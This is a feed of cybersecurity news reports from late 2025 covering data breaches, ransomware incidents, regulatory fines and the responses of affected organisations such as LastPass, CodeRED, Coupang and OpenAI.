
Received yesterday — 12 December 2025

Russia’s Digital Military Draft System Hit by Cyberattack, Source Code Leaked

12 December 2025 at 03:51


A cyberattack on Russia has reportedly targeted Russia’s digital military draft system. According to Grigory Sverdlin, head of Idite Lesom, a nonprofit that helps Russians avoid conscription, anonymous hackers successfully breached a key developer of the system on Thursday. “For the next few months, the system, which holds 30 million records, will not be able to send people off to kill or die,” Sverdlin wrote on Facebook. He added that his organization had received a large set of documents from the hackers, including source code, technical documentation, and internal communications from Russia’s software provider Micord, a central developer of the digital military draft system.

Cyberattack on Russia’s Digital Military Draft System 

Micord’s website was reportedly inaccessible on Thursday, displaying a notice that it was under “technical maintenance.” Meanwhile, the investigative outlet IStories, which obtained the documents from Idite Lesom, confirmed the breach with Micord’s director, Ramil Gabdrahmanov. “Listen, it could happen to anyone. Many are being attacked right now,” Gabdrahmanov said. He declined to confirm whether Micord had worked on Russia’s unified military registration database, stating, “We work on many different projects.” Nonetheless, IStories independently verified Micord’s involvement in the digital registry. Despite the cyberattack on Russia’s digital military draft system, some users reported that the database website was still accessible, though it remained unclear whether electronic draft summonses had been disrupted. The Russian Defense Ministry dismissed the claims of a breach as “fake news,” asserting that the registry continued to operate normally. “The registry has been repeatedly subjected to hacking attacks. They have all been successfully repelled,” the ministry said, emphasizing that attempts to disrupt the system had so far “failed to achieve their objectives,” IStories reported.

Digital Military Draft System: Modernizing Russia’s Draft Process 

The digital military draft system, part of a broader modernization of Russia’s wartime enlistment process, centralizes records of men aged 18 to 30 and allows authorities to issue summonses online, eliminating the need for in-person notifications.  The system has faced multiple delays, with its initial launch scheduled for November 2024. Russia’s fall 2025 draft, which runs from October 1 to December 31, was expected to rely on this digital registry in four regions, including Moscow.  Sverdlin noted that once fully operational, the online system automatically enforces restrictions on draftees who fail to report for compulsory service, including travel bans.  

Origins and Government Plans for the Unified Registry 

The hacker group reportedly remained in Micord’s system for several months, accessing critical infrastructure, operational correspondence, and the source code, which they claimed to have destroyed. The documents were shared with journalists at IStories, who confirmed their authenticity.  The Russian government first announced plans for a unified digital military registration registry in April 2023, when the State Duma passed a bill creating the system. RT Labs, a Rostelecom subsidiary, was initially named as one of the developers.   In February 2024, Rostelecom was designated as the sole contractor to complete the system for the Ministry of Digital Development, Communications, and Mass Media, with a completion deadline of December 31, 2024. Though initially intended for the 2024 fall draft, the registry became fully operational only in October 2025, with several regions adopting electronic summonses and phasing out paper notifications. 

Password Manager LastPass Penalized £1.2m by ICO for Security Failures

12 December 2025 at 03:23


The Information Commissioner’s Office (ICO) has fined password manager provider LastPass UK Ltd £1.2 million following a 2022 data breach that compromised the personal information of up to 1.6 million people in the UK. The data breach occurred in August 2022 and was the result of two isolated incidents that, when combined, enabled a hacker to gain unauthorized access to LastPass’ backup database. The stolen information included customer names, email addresses, phone numbers, and stored website URLs. While the data breach exposed sensitive personal information, the ICO confirmed there is no evidence that hackers were able to decrypt customer passwords. This is due to LastPass’ use of a ‘zero knowledge’ encryption system, which ensures that master passwords and vaults are stored locally on customer devices and never shared with the company.

Incident One: Corporate Laptop Compromised

The first incident involved the corporate laptop of a LastPass employee based in Europe. A hacker gained access to the company’s development environment and obtained encrypted company credentials. Although no personal information was taken at this stage, the credentials could have provided access to the backup database if decrypted. LastPass attempted to mitigate the hacker’s activity and believed the encryption keys remained safe, as they were stored outside the compromised environment in the vaults of four senior employees.

Incident Two: Personal Device Targeted

The second incident proved more damaging. The hacker targeted one of the senior employees who had access to the decryption keys. Exploiting a known vulnerability in a third‑party streaming service, the attacker gained access to the employee’s personal device. A keylogger was installed, capturing the employee’s master password. Multi‑factor authentication was bypassed using a trusted device cookie. This allowed the hacker to access both the employee’s personal and business LastPass vaults, which were linked by a single master password. From there, the hacker obtained the Amazon Web Services (AWS) access key and decryption key stored in the business vault. Combined with information taken the previous day, this enabled the extraction of the backup database containing customer personal information.

ICO’s Findings and Fine on LastPass UK

The ICO investigation concluded that LastPass failed to implement sufficiently strong technical and security measures, leaving customers exposed. Although the company’s zero knowledge encryption protected passwords, the exposure of personal data was deemed a serious failure. John Edwards, UK Information Commissioner, stated: “Password managers are a safe and effective tool for businesses and the public to manage their numerous login details, and we continue to encourage their use. However, as is clear from this incident, businesses offering these services should ensure that system access and use is restricted to reduce risks of attack. LastPass customers had a right to expect their personal information would be kept safe and secure. The company fell short of this expectation, resulting in the proportionate fine announced today.”

Lessons for Businesses

The ICO has urged all UK businesses to review their systems and procedures to prevent similar risks. This case underscores the importance of restricting system access, strengthening cybersecurity measures, and ensuring that employees’ personal devices do not become weak points in corporate networks. While password managers remain a recommended tool for managing login details, the incident shows that even trusted providers can fall short if internal safeguards are not sufficiently strong. The £1.2 million fine against LastPass UK Ltd serves as a clear reminder that companies handling sensitive data must uphold the highest standards of security. Although customer passwords were protected by the company’s zero knowledge encryption system, the exposure of personal information has left millions vulnerable. The ICO’s ruling reinforces the need for constant vigilance in the face of growing cyber threats. For both businesses and individuals, the message is straightforward: adopt strong security practices, conduct regular system reviews, and implement robust employee safeguards to reduce the risk of future data breaches.

City of Cambridge Advises Password Reset After Nationwide CodeRED Data Breach

12 December 2025 at 00:56


The City of Cambridge has released an important update regarding the OnSolve CodeRED emergency notifications system, also known locally as Cambridge’s reverse 911 system. The platform, widely used by thousands of local governments and public safety agencies across the country, was taken offline in November following a nationwide OnSolve CodeRED cyberattack. Residents who rely on CodeRED alerts for information about snow emergencies, evacuations, water outages, or other service disruptions are being asked to take immediate steps to secure their accounts and continue receiving notifications.

Impact of the OnSolve CodeRED Cyberattack on User Data

According to city officials, the data breach affected CodeRED databases nationwide, including Cambridge. The compromised information may include phone numbers, email addresses, and passwords of registered users. Importantly, the attack targeted the OnSolve CodeRED system itself, not the City of Cambridge or its departments. This OnSolve CodeRED cyberattack incident mirrors similar concerns raised in Monroe County, Georgia, where officials confirmed that residents’ personal information was also exposed. The Monroe County Emergency Management Agency emphasized that the breach was part of a nationwide cybersecurity incident and not a local failure.

Transition to CodeRED by Crisis24

In response, OnSolve permanently decommissioned the old CodeRED platform and migrated services to a new, secure environment known as CodeRED by Crisis24. The new system has undergone comprehensive security audits, including penetration testing and system hardening, to ensure stronger protection against future threats. For Cambridge residents, previously registered contact information has been imported into the new platform. However, due to security concerns, all passwords have been removed. Users must now reset their credentials before accessing their accounts.

Steps for City of Cambridge Residents and Users

To continue receiving emergency notifications, residents should:
  • Visit accountportal.onsolve.net/cambridgema
  • Enter their username (usually an email address)
  • Select “forgot password” to verify and reset credentials
  • If unsure of their username, use the “forgot username” option

Officials strongly advise against reusing old CodeRED passwords, as they may have been compromised. Instead, users should create strong, unique passwords and update their information once logged in. Additionally, anyone who used the same password across multiple accounts is urged to change those credentials immediately to reduce the risk of further exposure.

Broader National Context

The Monroe County cyberattack highlights the scale of the issue. Officials there reported that data such as names, addresses, phone numbers, and passwords were compromised. Residents who enrolled before March 31, 2025, had their information migrated to the new Crisis24 CodeRED platform, while those who signed up afterward must re‑enroll. OnSolve has reassured communities that the intrusion was contained within the original system and did not spread to other networks. While there is currently no evidence of identity theft, the incident underscores the growing risks of cyber intrusions nationwide.

Resources for Cybersecurity Protection

Residents who believe they may have been victims of cyber‑enabled fraud are encouraged to report incidents to the FBI Internet Crime Complaint Center (IC3) at ic3.gov. Additional resources are available to help protect individuals and families from fraud and cybercrime. Security experts note that the rising frequency of attacks highlights the importance of independent threat‑intelligence providers. Companies such as Cyble track vulnerabilities and cybercriminal activity across global networks, offering organizations tools to strengthen defenses and respond more quickly to incidents.

Looking Ahead

The City of Cambridge has thanked residents for their patience as staff worked with OnSolve to restore emergency alert capabilities. Officials emphasized that any breach of security is a serious concern and confirmed that they will continue monitoring the new CodeRED by Crisis24 platform to ensure its standards are upheld. In addition, the City is evaluating other emergency alerting systems to determine the most effective long‑term solution for community safety.

€750 Payout Proposed for 90,000 Victims as HSE Acknowledges Cyberattack Damage

10 December 2025 at 01:27


Four years after the HSE cyberattack that crippled Ireland’s national health service, the Health Service Executive has begun offering financial compensation to individuals whose personal data was compromised in the incident. The payment proposal is the first time the HSE has formally acknowledged the need to compensate those affected by what remains one of the largest recorded cyberattacks on health systems worldwide.  The cyberattack on HSE occurred on May 14, 2021, when the Conti ransomware group, a Russia-based cybercrime organization, launched a large-scale intrusion that forced the shutdown of the health service’s IT network. The ransomware incident led to widespread treatment delays and exposed sensitive information belonging to almost 100,000 staff members and patients. Investigators later determined that the breach began when a malicious file attached to a phishing email was opened on the dispersed and “frail” IT infrastructure used by the health service. 

Hundreds of Legal Proceedings Underway Following the HSE Cyberattack 

As legal disputes have grown over the last four years, the HSE has now extended an offer of €750 in damages to each affected claimant. A further €650 per person has been allocated to cover legal fees. According to Cork-based O’Dowd Solicitors, representing more than 100 individuals, the offer was received on Friday and was described to clients as a “significant development.” The firm told its clients that this was “the first time in public (or private that I know of, the HSE has acknowledged that they will need to compensate individuals impacted by the breach.” According to RTÉ News, the proposed €750 payment would be issued within 28 days of an accepted offer and would serve as a “full and final settlement” of any ongoing proceedings. O’Dowd Solicitors declined to comment publicly on the matter, though it is understood the firm is currently advising clients on their options. The offer follows a recent high-profile legal ruling in Ireland that affirmed an individual’s right to damages in relation to data breaches, a decision seen by legal observers as having implications for the mounting number of cases linked to the HSE cyberattack. As of November 2025, the HSE confirmed that approximately 620 legal proceedings had been issued in connection with the attack. A spokeswoman said that the HSE “is working closely with the State Claims Agency in relation to this matter and is engaging with legal representatives accordingly,” adding that “these legal matters between the HSE and affected individuals are confidential.” In earlier updates, the health service said it had reached out to all individuals whose information had been compromised, with 90,936 people ultimately contacted following the breach. The scale of the incident placed immense pressure on clinical operations, causing long delays in diagnostics, appointments, and elective procedures over an extended period.

Cybersecurity Overhaul Following the Conti Attack 

Since the 2021 intrusion, the HSE has noted that it has “invested significantly” in strengthening its cybersecurity posture. According to the organization, multiple work programs are underway to address vulnerabilities identified in the aftermath of the cyberattack on HSE. The HSE reports that it now responds to thousands of cyber threats annually and continues to expand “multi-layered cyber defenses” intended to detect and mitigate ongoing risks. The agency acknowledges that the attack exposed critical weaknesses in its digital infrastructure and reiterated that enhancing cyber capability remains a core operational priority.  The compensation development was first reported by the Irish Independent and signals a new phase in the long-running fallout from the HSE cyberattack carried out by the Conti ransomware group. For many victims, the proposed payments represent a long-awaited acknowledgment of the breach’s impact, though the final resolution of the hundreds of legal claims still depends on individual acceptance of the settlement terms. 

Barts Health Confirms Cl0p Ransomware Behind Data Breach Linked to Oracle Vulnerability


Barts Health NHS Trust has confirmed that the data breach at Barts Health was carried out by the Russian-speaking Cl0p ransomware group, which exploited a vulnerability in Oracle E-Business Suite. The Barts Health data breach involved the theft of files from one of the trust’s invoice databases, exposing information linked to payments for treatment and other services, some dating back several years.  In its official notification, the trust stated, “As a result of a recent incident involving data from our trust, we are informing those potentially affected that there is a risk some personal data is compromised.”  The trust confirmed that the criminal group stole files containing names and addresses of individuals required to pay for treatment or services at a Barts Health hospital. These files were later posted on the dark web. Barts Health emphasized that it is pursuing legal remedies, noting, “We are taking urgent action and seeking a High Court order to ban the publication, use or sharing of this data by anyone.” 

Details of the Barts Health Data Breach and Exposed Information 

The cyberattack on Barts Health occurred after Cl0p exploited a flaw in Oracle E-Business Suite, a widely used system for automating business processes. Oracle has since corrected the vulnerability, which has affected multiple organizations globally.  The trust has reported the Barts Health data breach to NHS England, the National Cyber Security Centre, the Metropolitan Police, and the Information Commissioner’s Office. Despite the intrusion, Barts Health stressed that core healthcare systems remain secure: “Please note our electronic patient record and clinical systems are not affected, and we are confident our core IT infrastructure is secure.”  Paying patients are encouraged to review their treatment invoices to understand which details may have been exposed. Some former employees also appear in the files due to outstanding salary sacrifice amounts or overpayments. Nearly half of the compromised records relate to suppliers whose information is already publicly accessible.  The affected database also contains accounting files that Barts Health has managed since April 2024 for Barking, Havering, and Redbridge University Hospitals NHS Trust. Both trusts are coordinating efforts to limit the impact. 

Timeline of the Breach and Potential Risks to Individuals 

Although the theft occurred in August, Barts Health did not receive any indication that data had been compromised until November, when the files were uploaded to the dark web. None of the information has emerged on the open internet, restricting exposure to individuals with access to encrypted and compressed files on the dark web.  The trust warned that the stolen files cannot grant direct access to personal accounts but may help criminals craft scams to trick victims into sharing sensitive information or making payments. Individuals with concerns are advised to contact the trust’s data protection officer or consult national guidance such as “Stop! Think Fraud – How to stay safe from scams.”  Barts Health apologized for the incident, stating, “We are very sorry that this has happened and are taking steps with our suppliers to ensure that it could not happen again.”  The Cl0p ransomware group is a well-known cybercriminal syndicate recognized for its multilayer extortion operations, including encryption-less ransomware tactics. Responsible for extorting more than $500 million in ransom payments worldwide, Cl0p became prominent in 2019 through extensive phishing campaigns and malware. The group frequently exploits zero-day vulnerabilities, enabling high-impact attacks and ransom demands. 

Former Student Charged in Western Sydney University Cyberattacks


A former student has been charged over an extended series of security breaches linked to the Western Sydney University cyberattack that has affected the institution since 2021. According to police, the university endured repeated unauthorized access, data exfiltration, system compromises, and the misuse of its infrastructure, activities that also involved threats to release student information on the dark web. Authorities estimate that hundreds of staff and students have been impacted over the course of the breaches. Detectives worked with Western Sydney University, the AFP’s Joint Policing Cyber Coordination Centre (JPC3), and external cybersecurity specialists to trace the intrusions. Their investigation led to a 27-year-old woman, a former student of the university, who was first arrested and charged in June.

The Complex Case of the Western Sydney University Cyberattack 

Despite the earlier arrest, police allege the student continued offending, sending more than 100,000 fraudulent emails to students to damage the university’s reputation and cause distress. As part of the continuing inquiry into the cyberattack on Western Sydney University, detectives executed a search warrant in North Kellyville, where the student was again arrested. Officers stated that she possessed a mobile phone modified to function as a computer terminal, allegedly used in cyber offences.  She was taken to The Hills Police Station and charged with multiple offences, including two counts of unauthorized function with intent to commit a serious offence, two counts of fabricating false evidence with intent to mislead a judicial tribunal, and breach of bail. Police say she also posted fabricated material online that was designed to exonerate herself during the ongoing legal proceedings. Bail was refused, and she was due to appear in court the following day. 

University Issues Public Notification After Continued Cyber Incidents 

Western Sydney University released a public notification on 23 October 2025, advising the community of personal information that may have been compromised in the broader Western Sydney University cyberattack pattern. The notice included a statement expressing regret over the situation: “I want to again apologize for the impact this is having and give you my assurance that we are doing everything we can to rectify this issue and support our community.” The university confirmed that it had been working closely with the NSW Police Force Cybercrime Squad’s Strike Force Docker, which had arrested and charged the former student on 25 June 2025. However, attempts to breach university systems continued even after the arrest, including attempts that exploited external IT service providers. Unusual activity was detected twice, on 6 August and 11 August 2025, within the Student Management System, which is hosted by a third-party provider on a cloud platform. An immediate investigation led the university to shut down access to the platform. It was later confirmed that unauthorized access occurred through external systems linked to the platform between 19 June and 3 September 2025. These linked systems allowed intruders to extract personal data from the Student Management System. University investigators also determined that fraudulent emails sent on 6 October 2025 had used data stolen during this period. Authorities asked the university to delay notifying the community to avoid disrupting the police investigation. With approval finally granted, the university issued a comprehensive notice to students, former students, staff, offer recipients, The College, The International College, and Early Learning Ltd personnel.

Scope of Compromised Information 

According to the public notification, the cyber incidents may have exposed a wide range of personal information, including contact details, names, dates of birth, identification numbers, nationality information, employment and payroll records, bank and tax details, driver's license and passport information, visa documentation, complaint files, and certain health, disability, and legal information.  Individual notifications are being issued to those affected, including updated findings from earlier incidents.  The notification advised individuals to change passwords, preferably to those of at least 15 characters, and implement multi-factor authentication across online accounts. Additional support services include a dedicated cyber incident website, a university phone line for inquiries, resources from the NSW Information and Privacy Commission, and reporting options via the Australian Cyber Security Centre for anyone who believes their information has been misused. 

FTC Action Hits Illuminate Education Over Massive Student Data Breach

2 December 2025 at 02:09


FTC action takes center stage as the U.S. Federal Trade Commission has announced strong enforcement steps against education technology (Edtech) provider Illuminate Education, following a major data breach that exposed the personal information of more than 10 million students across the United States. The agency said the company failed to implement reasonable security measures despite promising schools and parents that student information was protected.

Why the Agency Intervened

The FTC complaint outlines a series of allegations against the Wisconsin-based company, which provides cloud-based software tools for schools. According to the complaint, Illuminate Education claimed it used industry-standard practices to safeguard student information but failed to put in place basic security controls. The Illuminate Education data breach incident dates back to December 2021, when a hacker accessed the company’s cloud databases using login credentials belonging to a former employee who had left the company more than three years earlier. This lapse allowed unauthorized access to data belonging to 10.1 million students, including email addresses, home addresses, dates of birth, academic records, and sensitive health information. FTC officials said the company ignored warnings as early as January 2020, when a third-party vendor alerted it to several vulnerabilities in its systems. The data security failures included weak access controls, gaps in threat detection, and a lack of proper vulnerability monitoring and patch management. The agency also noted that student data was stored in plain text until at least January 2022, increasing the severity of the breach.

FTC Action: Requirements Under the Proposed Order

As part of the proposed settlement, the FTC will require Illuminate Education to adopt a comprehensive information security program and follow stricter privacy obligations. The proposed FTC order includes several mandatory steps:
  • Deleting any personal information that is no longer required for service delivery.
  • Following a transparent, publicly available data retention schedule that explains why data is collected and when it will be deleted.
  • Implementing a detailed information security program to protect the confidentiality and integrity of personal information.
  • Notifying the FTC when the company reports a data breach to any federal, state, or local authority.

The order also prohibits the company from misrepresenting its data security practices or delaying breach notifications to school districts and families. The FTC said Illuminate had waited nearly two years before informing some districts about the breach, impacting more than 380,000 students. The Commission has voted unanimously to advance the complaint and proposed order for public comment. It will be published in the Federal Register, where stakeholders can share feedback for 30 days before the FTC decides whether to finalize the consent order.

FTC Action and State-Level Enforcement

Alongside the federal enforcement, the state data breach settlement adds another layer of accountability. Attorneys General from California, Connecticut, and New York recently announced a $5.1 million settlement with Illuminate Education for failing to adequately protect student data during the same 2021 cyber incident. California will receive $3.25 million in civil penalties, and the settlement includes strict requirements designed to improve the company’s cybersecurity safeguards. With more than 434,000 California students affected, this marks one of the largest enforcement actions under the California K-12 Pupil Online Personal Information Protection Act (KOPIPA). State officials emphasized that educational technology companies must prioritize the security of children’s data, which often includes highly sensitive information like medical details and learning records.

South Korea’s Coupang Hit by Massive Data Breach Affecting Nearly 34 Million Customers

1 December 2025 at 02:00


South Korean e-commerce giant Coupang has confirmed a massive data breach that exposed personal information belonging to nearly 33.7 million customers, making it one of the country’s largest cybersecurity incidents in recent years. The company publicly apologised over the weekend, acknowledging that the Coupang data breach stemmed from unauthorised access that may have continued undetected for months. Park Dae-jun, CEO of Coupang, issued a statement on the company’s website saying, “We sincerely apologise once again for causing our customers inconvenience.” The firm, often referred to as the “Amazon of South Korea,” said it is cooperating with law enforcement and regulatory authorities as investigations continue.

Coupang Data Breach Went Undetected for Months

According to Coupang, the unauthorised access began on June 24 through overseas servers but was only discovered on November 18. The company initially believed only about 4,500 accounts were affected. However, further analysis revealed that 33.7 million users had some form of delivery-related personal information exposed. The leaked data includes customer names, phone numbers, email addresses, shipping addresses, and certain order histories. Coupang stressed that no payment card information, financial data, or login credentials were compromised. The company has 24.7 million active commercial users as of the third quarter, which means the Coupang data breach covers almost its entire user base.

Former Employee Identified as Main Suspect

South Korean police confirmed that they have secured the IP address used in the attack and have identified the suspect behind the breach. Investigators say the individual is a former Coupang employee, a Chinese national who has already left South Korea. “We are analysing server logs submitted by Coupang. We have secured the IP used by the suspect and are tracking them down,” an official at the Seoul Metropolitan Police said. Authorities are also verifying whether the individual is linked to an email sent to Coupang threatening to reveal the stolen information.

Government Steps In as Public Concern Rises

The Ministry of Science and ICT held an emergency meeting on Sunday to review the scale of the incident and assess whether Coupang violated any personal information protection rules. Minister Bae Kyung-hoon said regulators are closely monitoring the company’s handling of the breach. The Korea Internet & Security Agency (KISA) issued a public advisory warning users to remain alert for phishing attempts or scam messages pretending to be from Coupang. So far, police have not received reports of smishing or voice phishing linked to the breach, but authorities say preparations are in place in case the situation escalates. The Coupang data breach adds to growing frustration among South Korean consumers, who have witnessed a series of major data leaks this year. SK Telecom and other large companies have faced similar cybersecurity incidents, increasing pressure on businesses to strengthen internal security controls.

Coupang Issues Customer Guidance

The company has started notifying impacted customers through email and text messages. In an FAQ shared with users, Coupang clarified what information was exposed and what steps customers should take. The company reiterated that payment and card details and passwords were not affected. Coupang also explained that it notified authorities immediately after confirming the issue and is committed to updating customers as the investigation progresses. For now, the company says users do not need to take additional action beyond remaining cautious of unsolicited calls, links or messages claiming to be from Coupang.

Police are verifying the suspect's identity, travel history, and potential motives. They are also examining whether the individual acted alone or was linked to a wider scheme. The case has now moved from an internal inquiry to a full-scale criminal investigation. As authorities continue to analyse server logs and cross-border activity, concerns remain that the scale or impact of the Coupang data breach could grow. For now, officials say there is no evidence of financial misuse, but investigations are still in early stages.

OpenAI Confirms Mixpanel Breach Impacting API User Data

27 November 2025 at 02:06

Mixpanel security incident

OpenAI has confirmed a security incident involving Mixpanel, a third-party analytics provider used for its API product frontend. The company clarified that the OpenAI Mixpanel security incident stemmed solely from a breach within Mixpanel’s systems and did not involve OpenAI’s infrastructure. According to the initial investigation, an attacker gained unauthorized access to a portion of Mixpanel’s environment and exported a dataset that included limited identifiable information of some OpenAI API users. OpenAI stated that users of ChatGPT and other consumer-facing products were not impacted.

OpenAI Mixpanel Security Incident: What Happened

The OpenAI Mixpanel security incident originated on November 9, 2025, when Mixpanel detected an intrusion into a section of its systems. The attacker successfully exported a dataset containing identifiable customer information and analytics data. Mixpanel notified OpenAI on the same day and shared the affected dataset for review on November 25. OpenAI emphasized that no OpenAI systems were compromised, and that sensitive information such as chat content, API requests, prompts, outputs, API keys, passwords, payment details, government IDs, and authentication tokens was not exposed. The exposed dataset was strictly limited to analytics data collected through Mixpanel's tracking setup on platform.openai.com, the frontend interface for OpenAI's API product.

Information Potentially Exposed in the Mixpanel Data Breach

OpenAI confirmed that the type of information potentially included in the dataset comprised:
  • Names provided on API accounts
  • Email addresses associated with API accounts
  • Coarse location data (city, state, country) based on browser metadata
  • Operating system and browser information
  • Referring websites
  • Organization or User IDs linked to API accounts
OpenAI noted that the affected information does not include chat content, prompts, responses, or API usage data. Additionally, ChatGPT accounts, passwords, API keys, financial details, and government IDs were not involved in the incident.

OpenAI’s Response and Security Measures

In response to the Mixpanel security incident, OpenAI immediately removed Mixpanel from all production services and began reviewing the affected datasets. The company is actively notifying impacted organizations, admins, and users through direct communication. OpenAI stated that it has not found any indication of impact beyond Mixpanel’s systems but continues to closely monitor for signs of misuse. To reinforce user trust and strengthen data protection, OpenAI has:
  • Terminated its use of Mixpanel
  • Begun conducting enhanced security reviews across all third-party vendors
  • Increased security requirements for partners and service providers
  • Initiated a broader review of its vendor ecosystem
OpenAI reiterated that trust, security, and privacy remain central to its mission and that transparency is a priority when addressing incidents involving user data.

Phishing and Social Engineering Risks for Impacted Users

While the exposed information does not include highly sensitive data, OpenAI warned that the affected details, such as names, email addresses, and user IDs, could be leveraged in phishing or social engineering attacks. The company urged users to remain cautious and watch for suspicious messages, especially those containing links or attachments. Users are encouraged to:
  • Verify messages claiming to be from OpenAI
  • Be wary of unsolicited communication
  • Enable multi-factor authentication (MFA) on their accounts
  • Avoid sharing passwords, API keys, or verification codes
OpenAI stressed that the company never requests sensitive credentials through email, text, or chat. OpenAI confirmed it will provide further updates if new information emerges from ongoing investigations. Impacted users can reach out at mixpanelincident@openai.com for support or clarification.

U.S. CodeRED Emergency Alert System Down After Ransomware Attack

26 November 2025 at 12:33

U.S. CodeRED Emergency Alert System Down After Ransomware Attack

Crisis24’s OnSolve CodeRED emergency alert system has been disrupted by a cyberattack, leaving local governments throughout the U.S. searching for alternatives or waiting for a new system to come online. The INC ransomware group has claimed responsibility for the attack. Some personal data of users may have been exposed in the attack, including names, addresses, email addresses, phone numbers, and passwords, and users have been urged to change passwords for other accounts if the same password is used. Crisis24 is launching a new secure CodeRED System that was already in development, and local governments had varying reactions to the crisis.

New CodeRED Emergency Alert System Expected Soon

Several U.S. local governments issued statements after the attack, updating residents on the CodeRED system's status and their plans. The City of University Park, Texas, said Crisis24 is launching a new CodeRED System, which was already in the works. "Our provider assures us that the new CodeRED platform resides on a non-compromised, separate environment and that they completed a comprehensive security audit and engaged external experts for additional penetration testing and hardening," the city said in its statement. "The provider decommissioned the OnSolve CodeRED platform and is in the process of moving all customers to its new CodeRED platform." Craven County Emergency Services in North Carolina said the new CodeRED platform "will be available before November 28." In the meantime, Craven County said announcements and alerts will continue to be released through local media, the Craven County website, or on Craven County's social media accounts. The Douglas County Sheriff's Office in Colorado said on Nov. 24 that it took "immediate action to terminate our contract with CodeRED for cause. Our top priority is the privacy and protection of our citizens, which led to the decision to end our agreement with CodeRED." The Sheriff's Office said it "is actively searching for a replacement for the CodeRED platform." The office said it still has the ability to issue "IPAWS" alerts to citizens when necessary, and "will continue to implement various contingency plans, including outreach through social media and door-to-door notifications, to ensure our community stays informed during emergency situations."

INC Ransom Claims Responsibility for CodeRED Attack

The INC Ransom group claimed responsibility for the CodeRED emergency alert system attack on its dark web data leak site. The threat actors say they obtained initial access on Nov. 1, followed by network encryption on Nov. 10. The group claims to have exfiltrated approximately 1.15 TB of data before deploying encryption. To substantiate their claims, INC Ransom has published several data samples, including CSV files with client-related data, threat intelligence company Cyble reported in a note to clients. Additionally, the group released two screenshots allegedly showing negotiation attempts, in which the company purportedly offered as much as $150,000, an amount the attackers claim they refused.

SitusAMC Data Breach Under Investigation After Sensitive Information Compromised

25 November 2025 at 02:34

SitusAMC Data Breach

SitusAMC, a major provider of back-end services for leading banks and lenders, has confirmed a data breach that resulted in the compromise of certain client and customer information. The incident, discovered earlier this month, has raised concerns because of the company's extensive role in mortgage origination, servicing, and compliance within the real-estate financing ecosystem. Responding to a query from The Cyber Express, Michael Franco, Chief Executive Officer (CEO) of SitusAMC, said, "We recently became aware of a data security incident impacting certain of our systems. We promptly retained leading third-party experts, launched an investigation, and notified law enforcement. The incident has been contained and SitusAMC is fully operational. No encrypting malware was deployed on our systems. We are in direct contact with our clients about this matter. We remain focused on analyzing any potentially affected data and will provide updates directly to our clients as our investigation progresses." According to the company's disclosure, SitusAMC became aware of the incident on November 12, 2025, and later determined that specific information stored on its systems had been accessed without authorization. While the full scope of the SitusAMC data breach remains under investigation, the company stated that the impacted information includes corporate data associated with clients, such as accounting records and legal agreements, along with certain data belonging to clients' customers. SitusAMC emphasized that the incident did not involve encrypting malware and that its operational services continue to run without disruption. External cybersecurity experts and federal law enforcement authorities are assisting in the ongoing investigation.

SitusAMC Data Breach Details

In its public notice, the company disclosed that upon detecting the incident, immediate steps were taken to investigate, contain, and secure its systems. The firm began working closely with third-party specialists and notified federal law enforcement to ensure a coordinated response. SitusAMC reiterated that although some information was compromised, all services remain fully operational. No ransomware activity or system encryption was detected, indicating that the attack did not follow the pattern of typical extortion-driven breaches. The company is continuing to analyze the impacted data and remains in close contact with affected clients. In response to the breach, SitusAMC implemented several additional security measures aimed at strengthening its environment against further threats. These steps include resetting credentials, disabling certain remote access tools, updating firewall rules, and enhancing internal security configurations. The company noted that it is still determining which specific services and products may have been affected. However, early assessments indicate that core business operations remain intact.

Impact on Client and Customer Data

The company confirmed that certain client business information was accessed during the incident. This includes internal corporate data and documentation related to client relationships. SitusAMC also stated that some customer information tied to clients may have been impacted, though the nature and extent of this exposure is still being assessed. SitusAMC assured stakeholders that it is working “around the clock” alongside its advisors to determine the full level of impact and will provide updates as the investigation progresses.

Customer Notification and Transparency

To maintain transparency, the company publicly released an example of the customer notification letter distributed on November 22, 2025. The letter outlines what occurred, the types of information potentially exposed, and the steps being taken to safeguard systems moving forward. In the letter, the company reiterated that the incident is contained, services remain fully operational, and no encrypting malware was used. Clients were encouraged to reach out to the company's security team for additional queries.

Salesforce Confirms Wider Impact in Ongoing Gainsight Security Incident

24 November 2025 at 05:46

Salesforce

Salesforce has issued a new update on the ongoing Salesforce Gainsight security incident, confirming additional details about the unusual activity detected across Gainsight-published applications connected to the CRM platform. The company reiterated that the incident stemmed from the app’s external integration with Salesforce rather than any vulnerability in the Salesforce core platform.

Salesforce Confirms Expanded Investigation

In its latest advisory, Salesforce stated that the unusual activity affecting Gainsight applications may have enabled unauthorized access to certain customers' Salesforce data through the app-to-Salesforce connection. As part of its precautionary measures, Salesforce revoked all active access and refresh OAuth tokens associated with Gainsight-published applications and removed the apps from its AppExchange. While initial communication referenced only three affected customers, Salesforce confirmed on November 21 that the list has expanded, and all newly identified impacted customers have been notified directly. Salesforce emphasized that a broader investigation is underway and continues to provide updates on its official Help portal.

Gainsight Products and Connectors Temporarily Impacted

According to Gainsight’s latest communication, several of its products, including Gainsight CS, Community (CC), Northpass (CE), Skilljar (SJ), and Staircase (ST), have been affected by Salesforce’s precautionary disconnection. Although the products remain operational, they are currently unable to read or write data to Salesforce. In addition, several third-party connectors integrated with Gainsight, such as Gong.io, Zendesk, and HubSpot, have been temporarily disabled by their respective vendors out of an abundance of caution. Gainsight urged customers to rotate their S3 keys if they have not done so since November 20, 2025, as part of the secure log retrieval process.

No Indication of Salesforce Platform Vulnerability

Salesforce reiterated that there is no evidence suggesting the issue originated from a flaw within the Salesforce platform itself. Instead, the activity appears tied to the external OAuth-based connection between Gainsight applications and Salesforce environments. Crucially, Salesforce confirmed that while the OAuth tokens have been revoked, historical audit trails and logs remain intact, enabling full customer-led investigation efforts. The company also strongly encouraged customers to conduct thorough log reviews using Setup Audit Trail, Event Monitoring logs, and API activity records. Salesforce referenced the Salesforce Log Analysis Guide to support customers in assessing potential compromise indicators.

Indicators of Compromise Published

As part of its transparency efforts, Salesforce shared a list of Indicators of Compromise (IOCs) associated with the threat activity. These include several user agents—such as python-requests/2.32.3 and Salesforce-Multi-Org-Fetcher/1.0—and dozens of IP addresses linked to suspicious access attempts. Gainsight echoed Salesforce’s recommendations and is conducting its own forensic review with support from independent investigators. Both organizations confirmed that the Salesforce Gainsight security incident remains under active investigation. Gainsight has published a detailed timeline and continues to coordinate with Salesforce to determine the full impact. Customers seeking assistance have been directed to Salesforce Help and Gainsight Support for further updates.
